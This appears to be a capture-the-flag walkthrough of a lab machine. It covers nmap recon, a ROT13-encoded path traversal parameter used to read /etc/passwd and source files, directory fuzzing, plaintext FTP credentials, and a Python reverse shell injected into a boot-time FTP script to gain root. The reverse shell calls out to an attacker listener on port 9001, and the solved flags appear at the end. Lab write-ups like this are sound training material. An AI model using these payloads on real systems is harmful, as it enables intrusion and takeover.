Recon
Target : 192.168.2.103
simple network map scan:
nmap -sS -sV -T5 192.168.2.103
Notes:
Open ports 21, 22, 80
Versions : pyftpdlib 2.0.1 , OpenSSH 8.4p1, Apache httpd 2.4.62
As usual Since the port 80 is open, we started with a simple look on the browser:
The Sync config button takes us to the URL:
http://192.168.2.113/?theme=pbasvt.gkg
The page gave us valuable information about the FTP server running such as the FTP using Default credential, and server contains a FTP log file (Could be our target file to find)
I also noticed the weird value of the parameter
theme=pbasvt.gkg
Followed with the Manual Help button :
based on the :
Use the encrypted path input to explore hidden files!
we can tell that the application requires a specific encryption for files path in order to access their content.
ITCHY QUESTION : could weird the value of the of the
theme
param is following the same encryption? well lets find out …the main page provided us with 3 different values for the
theme
param :
jrypbzr.gkg
pbasvt.gkg
ernqzr.gkg
a quick cipher identifier tool found a potential ROT13 encryption:
after decoding these values :
jrypbzr.gkg → welcome.txt
pbasvt.gkg → config.txt
ernqzr.gkg → readme.txt
we can tell that the
theme
param requires a ROT13 encryption for path/to/file, POSSIBLE PATH TRAVERSAL? lets find out…
in order to find whether the app is vulnerable to Path Traversal, we can rot13 encrypt the/etc/passwd
with rot13.com file and pray for the best :
BOOOMM : Path Traversal
The content of
/etc/passwd
popped on the screen proving the path traversal vulnerability…
Key Finding :Two users : welcome, max
Now our target is the FTP log file however, since we don't know the actual path to the .log file, we’ll relay on
Fuzzing
in order to find it :
The fuzzing reveals a
/logs
directory with 403
response code.Now since we know the directory name we should
Fuzz
for the file name with a specific extension : log
For
feroxbuster
we can specify the argument --extensions log
:feroxbuster -u http://192.168.2.113/logs
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
--filter-status 404 --scan-dir-listings --extensions log
The fuzzing was successful throwing the
/logs/ftp_server.log
back to us with a status code 
200
curl http://192.168.2.113/logs/ftp_server.log --output -
The log file reveals to two different files on the server :
/opt/ftp_server.py → ftp server configuration file
/opt/rev.sh → a bash script file
since both of the files under the
/opt/
we can use our previously found Path Traversal vulnerability with ROT13 encryption to access their content :
As predicted .. the ftp_server.py file contained the ftp server configuration with plain text credentials :
JACKPOT :
FTP USER : ADMIN
FTP PASSWORD : 12345
We can now access the ftp server with :
ftp 192.168.2.103
Reverse Shell
Entry point : ftp://192.168.1.138/ftp_server.py
Payload and listener
The FTP server contained both the ftp_server.py and rev.sh file which owned by root…
The rev.sh contained :
Based on the content of the bash file, it seems a good entry for a reverse shell … how ever we cannot execute it, we can only read its content with the Path traversal.
On the other hand we have the ftp_server.py file…
the machine establish the ftp server on on boot up, with that being said :
we can get the ftp_server.py file locally, inject or reverse shell then put in back on the target and finally restart the machine to get root access…
we can achieve that with the following :
ftp> get ftp_server.py # GET THE FILE ON OWN LOCAL MACHINE
nano ftp_server.py
our injected reverse shell :
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.2.102",9001));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty; pty.spawn("/bin/bash")
And that will be after importing the required libraries
import socket,subprocess
this will be our final result :
Then we can simply put our crafted
ftp_server.py
file on the machine with :ftp> put ftp_server.py # PUT THE FILE ON THE TARGET MACHINE
Finally, we can set up our listener :
nc -lnvp 9001
And the restart the target.
On boot we will achieve the reverse shell :
Root access
We successfully achieved root access on the server.
root@13max:/opt# cat /root/root.flag
flag{root-aaa245a6e5a82937c985c50c86282892}
root@13max:/opt# cat /home/welcome/user.flag
flag{user-a89162ba751904d59ebd8fed2fce8880}
User flag : flag{user-a89162ba751904d59ebd8fed2fce8880}
Root flag : flag{root-aaa245a6e5a82937c985c50c86282892}